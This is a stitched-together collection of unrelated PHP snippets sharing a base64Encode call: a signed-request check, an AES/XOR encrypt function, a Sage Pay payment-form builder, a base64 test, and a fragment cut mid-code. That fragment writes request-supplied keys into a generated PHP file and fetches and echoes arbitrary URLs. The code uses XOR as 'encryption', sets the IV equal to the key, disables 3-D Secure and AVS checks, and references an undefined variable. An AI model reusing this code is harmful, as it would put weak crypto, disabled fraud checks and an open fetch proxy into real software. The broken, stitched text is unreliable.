private function authorize($signed_request) { $hash = sha256Encode($signed_request[1], $this->private_key); $hash = base64Encode($hash); if ($hash != $signed_request[0]) { return false; } $context = json_decode(base64Decode($signed_request[1])); $context = $context->context; $this->token = $context->client->access_token; $this->token_type = $context->client->token_type; $this->project_id = $context->environment->current_project; return true; }
function encryptAndEncode($strIn, $strEncryptionType, $strEncryptionPassword) { if ($strEncryptionType == "XOR") { //** XOR encryption with Base64 encoding ** return base64Encode(simpleXor($strIn, $strEncryptionPassword)); } else { //** AES encryption, CBC blocking with PKCS5 padding then HEX encoding - DEFAULT ** //** use initialization vector (IV) set from $strEncryptionPassword $strIV = $strEncryptionPassword; //** add PKCS5 padding to the text to be encypted $strIn = self::addPKCS5Padding($strIn); //** perform encryption with PHP's MCRYPT module $strCrypt = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $strEncryptionPassword, $strIn, MCRYPT_MODE_CBC, $strIV); //** perform hex encoding and return return "@" . bin2hex($strCrypt); } }
function protxvspform_link($params) { $strTransactionType = "PAYMENT"; $strCustomerName = $params['clientdetails']['firstname'] . " " . $params['clientdetails']['lastname']; $strBillingAddress = $params['clientdetails']['address1']; $strBillingPostCode = $params['clientdetails']['postcode']; $strContactNumber = $params['clientdetails']['phonenumber']; $strEncryptionPassword = $params['xorencryptionpw']; $strVendorTxCode = date("YmdHis") . $params['invoiceid']; $strBasket = "1:" . $params['description'] . ":1:" . $params['amount'] . ":0:" . $params['amount'] . ":" . $params['amount'] . ""; $strPost = "VendorTxCode=" . $strVendorTxCode; $strPost = $strPost . "&Amount=" . number_format($params['amount'], 2); $strPost = $strPost . "&Currency=" . $params['currency']; $strPost = $strPost . "&Description=" . $params['description']; $strPost = $strPost . "&SuccessURL=" . $params['systemurl'] . "/modules/gateways/callback/protxvspform.php?invoiceid=" . $params['invoiceid']; $strPost = $strPost . "&FailureURL=" . $params['systemurl'] . "/modules/gateways/callback/protxvspform.php?invoiceid=" . $params['invoiceid']; $strPost = $strPost . "&CustomerName=" . $strCustomerName; $strPost = $strPost . "&CustomerEMail=" . $strCustomerEMail; $strPost = $strPost . "&VendorEMail=" . $params['vendoremail']; $strPost = $strPost . "&BillingAddress=" . $strBillingAddress; $strPost = $strPost . "&BillingPostCode=" . $strBillingPostCode; $strPost = $strPost . "&DeliveryAddress=" . $strBillingAddress; $strPost = $strPost . "&DeliveryPostCode=" . $strBillingPostCode; $strPost = $strPost . "&ContactNumber=" . $strContactNumber; $strPost = $strPost . "&AllowGiftAid=0"; if ($strTransactionType !== "AUTHENTICATE") { $strPost = $strPost . "&ApplyAVSCV2=0"; } $strPost = $strPost . "&Apply3DSecure=0"; $strCrypt = base64Encode(SimpleXor($strPost, $strEncryptionPassword)); $strPurchaseURL = "https://live.sagepay.com/gateway/service/vspform-register.vsp"; if ($params['testmode']) { $strPurchaseURL = "https://test.sagepay.com/gateway/service/vspform-register.vsp"; } $code = "<form action=\"" . $strPurchaseURL . "\" method=\"post\">\n<input type=\"hidden\" name=\"VPSProtocol\" value=\"2.22\">\n<input type=\"hidden\" name=\"TxType\" value=\"" . $strTransactionType . "\">\n<input type=\"hidden\" name=\"Vendor\" value=\"" . $params['vendorname'] . "\">\n<input type=\"hidden\" name=\"Crypt\" value=\"" . $strCrypt . "\">\n<input type=\"submit\" value=\"" . $params['langpaynow'] . "\">\n</form>"; return $code; }
$rs = "false"; if (!file_exists($filenamekey) || !$pkey2) { $rs = "false"; } else { $rs = $pkey2; } echo "&key=" . $rs . "&"; } else { if ($savekey && !$pkey1 && !$pkey2 && !$pkey3) { $arrkey = explode("|", $savekey); $fp = fopen($filenamekey, 'w'); fwrite($fp, '<?php ;$pkey1=base64_decode(\'' . base64_encode($arrkey[0]) . '\');$pkey2=base64_decode(\'' . base64_encode($arrkey[1]) . '\');$pkey3=base64_decode(base64_decode(\'' . base64_encode($arrkey[2]) . '\'));?>'); fclose($fp); } else { if (!$paramInfo) { return; } initparam($paramInfo); $text = get_curl($link); if ($encRes == 1) { $text = encrypt($text, $pkey1); } else { if ($encRes == 2) { $text = base64Encode($text, $pkey3); } } echo $text; } } ?>
function testBase64() { $hasErrors = false; $allData = ''; for ($i = 0; $i < 64; $i += 4) { $allData .= chr($i << 2 | $i + 1 >> 4) . chr($i + 1 << 4 | $i + 2 >> 2) . chr($i + 2 << 6 | $i + 3); } for ($size = 1; $size <= 48; $size++) { $allDataBase64 = base64Encode(substr($allData, 0, $size)); printf("base64Encode(allData) = %s\n", $allDataBase64); $allDataBase64DotSlash = base64EncodeDotSlash(substr($allData, 0, $size)); printf("base64EncodeDotSlash(allData) = %s\n", $allDataBase64DotSlash); $allDataBase64DotSlashOrdered = base64EncodeDotSlashOrdered(substr($allData, 0, $size)); printf("base64EncodeDotSlashOrdered(allData) = %s\n\n", $allDataBase64DotSlashOrdered); $testAllData = base64Decode($allDataBase64); printf("base64Decode(allDataBase64) ret = %u: ", $testAllData === false ? 1 : 0); $good = true; for ($i = 0; $i < $size; $i++) { if ($testAllData[$i] != $allData[$i]) { $good = false; } } if ($testAllData === false || !$good) { $hasErrors = true; } printf("%s\n", $good ? "good" : "bad"); $testAllData = base64DecodeDotSlash($allDataBase64DotSlash); printf("base64DecodeDotSlash(allDataBase64DotSlash) ret = %u: ", $testAllData === false ? 1 : 0); $good = true; for ($i = 0; $i < $size; $i++) { if ($testAllData[$i] != $allData[$i]) { $good = false; } } if ($testAllData === false || !$good) { $hasErrors = true; } printf("%s\n", $good ? "good" : "bad"); $testAllData = base64DecodeDotSlashOrdered($allDataBase64DotSlashOrdered); printf("base64DecodeDotSlashOrdered(allDataBase64DotSlashOrdered) ret = %u: ", $testAllData === false ? 1 : 0); $good = true; for ($i = 0; $i < $size; $i++) { if ($testAllData[$i] != $allData[$i]) { $good = false; } } if ($testAllData === false || !$good) { $hasErrors = true; } printf("%s\n\n\n", $good ? "good" : "bad"); } printf("Should error:\n"); $testAllData = base64Decode($allDataBase64DotSlash); printf("base64Decode(allDataBase64DotSlash) ret = %u: %s\n", $testAllData === false ? 1 : 0, $testAllData === false ? "good" : "bad"); if ($testAllData !== false) { $hasErrors = true; } $testAllData = base64DecodeDotSlash($allDataBase64); printf("base64DecodeDotSlash(allDataBase64) ret = %u: %s\n", $testAllData === false ? 1 : 0, $testAllData === false ? "good" : "bad"); if ($testAllData !== false) { $hasErrors = true; } $testAllData = base64DecodeDotSlashOrdered($allDataBase64); printf("base64DecodeDotSlashOrdered(allDataBase64) ret = %u: %s\n", $testAllData === false ? 1 : 0, $testAllData === false ? "good" : "bad"); if ($testAllData !== false) { $hasErrors = true; } if ($hasErrors) { printf("*** FAILED ***\n"); } else { printf("*** PASSED ***\n"); } return $hasErrors; }